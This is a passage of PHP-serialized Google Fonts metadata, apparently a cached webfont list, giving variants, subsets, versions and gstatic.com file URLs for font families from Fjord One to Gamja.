One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/fjordone/v21/zOL-4pbEnKBY_9S1jNKr6e5As-FeiQ.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:407;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Flamenco\";s:8:\"variants\";a:2:{i:0;s:3:\"300\";i:1;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:3:\"300\";s:76:\"http://fonts.gstatic.com/s/flamenco/v18/neIPzCehqYguo67ssZ0qNIkyepH9qGsf.ttf\";s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/flamenco/v18/neIIzCehqYguo67ssaWGHK06UY30.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:408;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Flavors\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/flavors/v22/FBV2dDrhxqmveJTpbkzlNqkG9UY.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:409;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Fleur De Leah\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/fleurdeleah/v7/AYCNpXX7ftYZWLhv9UmPJTMC5vat4I_Gdq0.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:410;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Flow Block\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/flowblock/v7/wlp0gwfPCEB65UmTk-d6-WZlbCBXE_I.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:411;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Flow Circular\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/flowcircular/v7/lJwB-pc4j2F-H8YKuyvfxdZ45ifpWdr2rIg.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:412;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Flow Rounded\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/flowrounded/v7/-zki91mtwsU9qlLiGwD4oQX3oZX-Xup87g.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:413;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Fondamento\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/fondamento/v16/4UaHrEJGsxNmFTPDnkaJx63j5pN1MwI.ttf\";s:6:\"italic\";s:80:\"http://fonts.gstatic.com/s/fondamento/v16/4UaFrEJGsxNmFTPDnkaJ96_p4rFwIwJePw.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:414;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Fontdiner Swanky\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/fontdinerswanky/v19/ijwOs4XgRNsiaI5-hcVb4hQgMvCD4uEfKiGvxts.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:415;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Forum\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/forum/v16/6aey4Ky-Vb8Ew_IWMJMa3mnT.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:416;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Francois One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/francoisone/v20/_Xmr-H4zszafZw3A-KPSZutNxgKQu_avAg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:417;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Frank Ruhl Libre\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:6:\"hebrew\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:93:\"http://fonts.gstatic.com/s/frankruhllibre/v12/j8_36_fAw7jrcalD7oKYNX0QfAnPUxvHxJDMhYeIHw8.ttf\";s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/frankruhllibre/v12/j8_w6_fAw7jrcalD7oKYNX0QfAnPa7fv4JjnmY4.ttf\";s:3:\"500\";s:93:\"http://fonts.gstatic.com/s/frankruhllibre/v12/j8_36_fAw7jrcalD7oKYNX0QfAnPU0PGxJDMhYeIHw8.ttf\";s:3:\"700\";s:93:\"http://fonts.gstatic.com/s/frankruhllibre/v12/j8_36_fAw7jrcalD7oKYNX0QfAnPUwvAxJDMhYeIHw8.ttf\";s:3:\"900\";s:93:\"http://fonts.gstatic.com/s/frankruhllibre/v12/j8_36_fAw7jrcalD7oKYNX0QfAnPUzPCxJDMhYeIHw8.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:418;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Fraunces\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:142:\"http://fonts.gstatic.com/s/fraunces/v24/6NUh8FyLNQOQZAnv9bYEvDiIdE9Ea92uemAk_WBq8U_9v0c2Wa0K7iN7hzFUPJH58nib1603gg7S2nfgRYIctxqjDvTShUtWNg.ttf\";s:3:\"200\";s:142:\"http://fonts.gstatic.com/s/fraunces/v24/6NUh8FyLNQOQZAnv9bYEvDiIdE9Ea92uemAk_WBq8U_9v0c2Wa0K7iN7hzFUPJH58nib1603gg7S2nfgRYIcNxujDvTShUtWNg.ttf\";s:3:\"300\";s:142:\"http://fonts.gstatic.com/s/fraunces/v24/6NUh8FyLNQOQZAnv9bYEvDiIdE9Ea92uemAk_WBq8U_9v0c2Wa0K7iN7hzFUPJH58nib1603gg7S2nfgRYIc6RujDvTShUtWNg.ttf\";s:7:\"regular\";s:142:\"http://fonts.gstatic.com/s/fraunces/v24/6NUh8FyLNQOQZAnv9bYEvDiIdE9Ea92uemAk_WBq8U_9v0c2Wa0K7iN7hzFUPJH58nib1603gg7S2nfgRYIctxujDvTShUtWNg.ttf\";s:3:\"500\";s:142:\"http://fonts.gstatic.com/s/fraunces/v24/6NUh8FyLNQOQZAnv9bYEvDiIdE9Ea92uemAk_WBq8U_9v0c2Wa0K7iN7hzFUPJH58nib1603gg7S2nfgRYIchRujDvTShUtWNg.ttf\";s:3:\"600\";s:142:\"http://fonts.gstatic.com/s/fraunces/v24/6NUh8FyLNQOQZAnv9bYEvDiIdE9Ea92uemAk_WBq8U_9v0c2Wa0K7iN7hzFUPJH58nib1603gg7S2nfgRYIcaRyjDvTShUtWNg.ttf\";s:3:\"700\";s:142:\"http://fonts.gstatic.com/s/fraunces/v24/6NUh8FyLNQOQZAnv9bYEvDiIdE9Ea92uemAk_WBq8U_9v0c2Wa0K7iN7hzFUPJH58nib1603gg7S2nfgRYIcUByjDvTShUtWNg.ttf\";s:3:\"800\";s:142:\"http://fonts.gstatic.com/s/fraunces/v24/6NUh8FyLNQOQZAnv9bYEvDiIdE9Ea92uemAk_WBq8U_9v0c2Wa0K7iN7hzFUPJH58nib1603gg7S2nfgRYIcNxyjDvTShUtWNg.ttf\";s:3:\"900\";s:142:\"http://fonts.gstatic.com/s/fraunces/v24/6NUh8FyLNQOQZAnv9bYEvDiIdE9Ea92uemAk_WBq8U_9v0c2Wa0K7iN7hzFUPJH58nib1603gg7S2nfgRYIcHhyjDvTShUtWNg.ttf\";s:9:\"100italic\";s:144:\"http://fonts.gstatic.com/s/fraunces/v24/6NVf8FyLNQOQZAnv9ZwNjucMHVn85Ni7emAe9lKqZTnbB-gzTK0K1ChJdt9vIVYX9G37lvd9sPEKsxx664UJf1hLTP7Wp05GNi3k.ttf\";s:9:\"200italic\";s:144:\"http://fonts.gstatic.com/s/fraunces/v24/6NVf8FyLNQOQZAnv9ZwNjucMHVn85Ni7emAe9lKqZTnbB-gzTK0K1ChJdt9vIVYX9G37lvd9sPEKsxx664UJf1jLTf7Wp05GNi3k.ttf\";s:9:\"300italic\";s:144:\"http://fonts.gstatic.com/s/fraunces/v24/6NVf8FyLNQOQZAnv9ZwNjucMHVn85Ni7emAe9lKqZTnbB-gzTK0K1ChJdt9vIVYX9G37lvd9sPEKsxx664UJf1gVTf7Wp05GNi3k.ttf\";s:6:\"italic\";s:144:\"http://fonts.gstatic.com/s/fraunces/v24/6NVf8FyLNQOQZAnv9ZwNjucMHVn85Ni7emAe9lKqZTnbB-gzTK0K1ChJdt9vIVYX9G37lvd9sPEKsxx664UJf1hLTf7Wp05GNi3k.ttf\";s:9:\"500italic\";s:144:\"http://fonts.gstatic.com/s/fraunces/v24/6NVf8FyLNQOQZAnv9ZwNjucMHVn85Ni7emAe9lKqZTnbB-gzTK0K1ChJdt9vIVYX9G37lvd9sPEKsxx664UJf1h5Tf7Wp05GNi3k.ttf\";s:9:\"600italic\";s:144:\"http://fonts.gstatic.com/s/fraunces/v24/6NVf8FyLNQOQZAnv9ZwNjucMHVn85Ni7emAe9lKqZTnbB-gzTK0K1ChJdt9vIVYX9G37lvd9sPEKsxx664UJf1iVSv7Wp05GNi3k.ttf\";s:9:\"700italic\";s:144:\"http://fonts.gstatic.com/s/fraunces/v24/6NVf8FyLNQOQZAnv9ZwNjucMHVn85Ni7emAe9lKqZTnbB-gzTK0K1ChJdt9vIVYX9G37lvd9sPEKsxx664UJf1isSv7Wp05GNi3k.ttf\";s:9:\"800italic\";s:144:\"http://fonts.gstatic.com/s/fraunces/v24/6NVf8FyLNQOQZAnv9ZwNjucMHVn85Ni7emAe9lKqZTnbB-gzTK0K1ChJdt9vIVYX9G37lvd9sPEKsxx664UJf1jLSv7Wp05GNi3k.ttf\";s:9:\"900italic\";s:144:\"http://fonts.gstatic.com/s/fraunces/v24/6NVf8FyLNQOQZAnv9ZwNjucMHVn85Ni7emAe9lKqZTnbB-gzTK0K1ChJdt9vIVYX9G37lvd9sPEKsxx664UJf1jiSv7Wp05GNi3k.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:419;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Freckle Face\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/freckleface/v14/AMOWz4SXrmKHCvXTohxY-YI0U1K2w9lb4g.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:420;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Fredericka the Great\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:98:\"http://fonts.gstatic.com/s/frederickathegreat/v15/9Bt33CxNwt7aOctW2xjbCstzwVKsIBVV-9Skz7Ylch2L.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:421;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Fredoka\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:6:\"hebrew\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:104:\"http://fonts.gstatic.com/s/fredoka/v9/X7nP4b87HvSqjb_WIi2yDCRwoQ_k7367_B-i2yQag0-mac3OryLMFuOLlNldbw.ttf\";s:7:\"regular\";s:104:\"http://fonts.gstatic.com/s/fredoka/v9/X7nP4b87HvSqjb_WIi2yDCRwoQ_k7367_B-i2yQag0-mac3O8SLMFuOLlNldbw.ttf\";s:3:\"500\";s:104:\"http://fonts.gstatic.com/s/fredoka/v9/X7nP4b87HvSqjb_WIi2yDCRwoQ_k7367_B-i2yQag0-mac3OwyLMFuOLlNldbw.ttf\";s:3:\"600\";s:104:\"http://fonts.gstatic.com/s/fredoka/v9/X7nP4b87HvSqjb_WIi2yDCRwoQ_k7367_B-i2yQag0-mac3OLyXMFuOLlNldbw.ttf\";s:3:\"700\";s:104:\"http://fonts.gstatic.com/s/fredoka/v9/X7nP4b87HvSqjb_WIi2yDCRwoQ_k7367_B-i2yQag0-mac3OFiXMFuOLlNldbw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:422;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Fredoka One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/fredokaone/v13/k3kUo8kEI-tA1RRcTZGmTmHBA6aF8Bf_.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:423;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Freehand\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"khmer\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v27\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/freehand/v27/cIf-Ma5eqk01VjKTgAmBTmUOmZJk.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:424;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Fresca\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/fresca/v18/6ae94K--SKgCzbM2Gr0W13DKPA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:425;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Frijole\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/frijole/v14/uU9PCBUR8oakM2BQ7xPb3vyHmlI.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:426;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Fruktur\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:4:{i:0;s:12:\"cyrillic-ext\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v26\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/fruktur/v26/SZc53FHsOru5QYsMfz3GkUrS8DI.ttf\";s:6:\"italic\";s:73:\"http://fonts.gstatic.com/s/fruktur/v26/SZc73FHsOru5QYsMTz_MlWjX4DJXgQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:427;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Fugaz One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/fugazone/v15/rax_HiWKp9EAITukFslMBBJek0vA8A.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:428;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Fuggles\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:69:\"http://fonts.gstatic.com/s/fuggles/v8/k3kQo8UEJOlD1hpOTd7iL0nAMaM.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:429;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Fuzzy Bubbles\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/fuzzybubbles/v5/6qLGKZMbrgv9pwtjPEVNV0F2NnP5Zxsreko.ttf\";s:3:\"700\";s:86:\"http://fonts.gstatic.com/s/fuzzybubbles/v5/6qLbKZMbrgv9pwtjPEVNV0F2Ds_WQxMAZkM1pn4.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:430;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"GFS Didot\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"greek\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/gfsdidot/v15/Jqzh5TybZ9vZMWFssvwiF-fGFSCGAA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:431;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"GFS Neohellenic\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"greek\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:88:\"http://fonts.gstatic.com/s/gfsneohellenic/v25/8QIRdiDOrfiq0b7R8O1Iw9WLcY5TLahP46UDUw.ttf\";s:6:\"italic\";s:90:\"http://fonts.gstatic.com/s/gfsneohellenic/v25/8QITdiDOrfiq0b7R8O1Iw9WLcY5jL6JLwaATU91X.ttf\";s:3:\"700\";s:92:\"http://fonts.gstatic.com/s/gfsneohellenic/v25/8QIUdiDOrfiq0b7R8O1Iw9WLcY5rkYdr644fWsRO9w.ttf\";s:9:\"700italic\";s:94:\"http://fonts.gstatic.com/s/gfsneohellenic/v25/8QIWdiDOrfiq0b7R8O1Iw9WLcY5jL5r37oQbeMFe985V.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:432;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Gabriela\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/gabriela/v14/qkBWXvsO6sreR8E-b_m-zrpHmRzC.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:433;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Gaegu\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":3:{s:3:\"300\";s:69:\"http://fonts.gstatic.com/s/gaegu/v15/TuGSUVB6Up9NU57nifw74sdtBk0x.ttf\";s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/gaegu/v15/TuGfUVB6Up9NU6ZLodgzydtk.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/gaegu/v15/TuGSUVB6Up9NU573jvw74sdtBk0x.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:434;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Gafata\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/gafata/v16/XRXV3I6Cn0VJKon4MuyAbsrVcA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:435;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Galada\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:7:\"bengali\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/galada/v14/H4cmBXyGmcjXlUX-8iw-4Lqggw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:436;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Galdeano\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/galdeano/v22/uU9MCBoQ4YOqOW1boDPx8PCOg0uX.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:437;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Galindo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/galindo/v20/HI_KiYMeLqVKqwyuQ5HiRp-dhpQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:438;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Gamja 